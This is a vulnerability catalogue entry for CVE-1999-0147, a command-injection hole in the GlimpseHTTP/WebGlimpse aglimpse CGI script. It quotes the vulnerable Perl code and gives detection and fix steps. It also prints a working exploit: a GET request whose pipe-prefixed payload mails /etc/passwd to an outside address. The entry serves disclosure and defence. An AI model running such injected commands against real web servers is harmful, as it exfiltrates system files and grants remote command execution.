AGlimpse

Vulnerability Description

Brief description: The GlimpseHTTP package does not check its input adequately, allowing users to insert metacharacters to force remote execution of a command.

Full description: These packages are popular collections of tools that provide easy-to-use interface to Glimpse, an indexing and query system, to provide a search facility on web sites. Due to insufficient argument checking by some of GlimpseHTTP and WebGlimpse (before version 1.5) routines, intruders may be able to force it to execute arbitrary commands with the privileges of the httpd (8) process.

The code is as follows:

$path_info = $ENV{'PATH_INFO'};
$_ = $path_info;

# /<length>/$indexdir/$path is the format of the PATH_INFO

# might as well start the message now
print "Content-type: text/html\n\n";
print "<HTML>\n"; print "<HEAD>\n";

if ( m|^/([0-9]*)(.*)$| ) {
        $length = $1;
        $path = $2;
        $path =~ s|"||g;  } else {
        &err_badargs;  }

$indexdir = substr($path,0,$length);
$relpath = substr($path,$length,length($path));

# print "<br>indexdir=$indexdir<br>relpath=$relpath<br>";

open(CONF,"$indexdir/archive.cfg") || &err_conf;
Note that this splits PATH_INFO in two fields, $length and $path, and then takes the first $length characters from $path and puts them in $indexdir. The last line opens $indexdir/archive.cfg .

By setting $indexdir to a string that begins with '|', the system will execute whatever it finds after the pipe, giving it as STDIN what you write to the CONF handle. If $indexdir is set to something like

|IFS=5;CMD=5mail5drazvan\@pop3.kappa.ro\</etc/passwd;eval$CMD;echo it will execute the command in CMD using IFS as separator. The one above sends the remote user the /etc/passwd from the host on which the web server is running.. (The last echo (1) is used to ignore the rest of the string.)

Components: GlimpseHTTP WebGlimpse

Systems: independent of OS

Effect(s) of exploiting: Can execute programs on web server with privileges of web server program

Detecting the hole:

    1. Check for the above code in your WebGlimpse or GlimpseHTTP program.

Fixing the hole:

    1. You need to get rid of the offending programs.
    1. Disable GlimpseHTTP and WebGlimpse .
    2. Upgrade to WebGlimpse version 1.5 or later. GlimpseHTTP is no longer supported.

Other information:

Keywords

metacharacter

Cataloguing

PA Classification(s):

RISOS Classification(s):

DCS Classification(s):

CVE Number: CVE-1999-0147 -- The aglimpse CGI program of the Glimpse package allows remote execution of arbitrary commands

Exploit Information

Attack: Telnet to the target machine's web server and enter the following: 

GET /cgi-bin/aglimpse/80|IFS=5;CMD=5mail5drazvan\@pop3.kappa.ro\</etc/passwd;eval$CMD;echo
Note that the cgi-bin directory could be located somewhere else (for example in /scripts or /cgi ). Make the obvious change if this is so.

Related Information

The Project FUSE web site has a page about GlimpseHTTP security. CERT Advisory CA-97.25.CGI_metachar, Sanitizing User-Supplied Data in CGI Scripts has general advice on sanitizing user input for CGI scripts that is relevant.

Advisories: ISS X-Force database entry http-cgi-glimpse ; CERT Vendor-initiated bulletin VB-97.13, Vulnerability in GlimpseHTTP and WebGlimpse CGI scripts from Project FUSE

Related Vulnerabilities:

Reportage

Reporting: Razvan Dragomirescu in Bugtraq (Wed Jul 02 1997 19:32:09 )

Revision Number 1

  1. Stacey Anderson (6/26/2000):
    Initial entry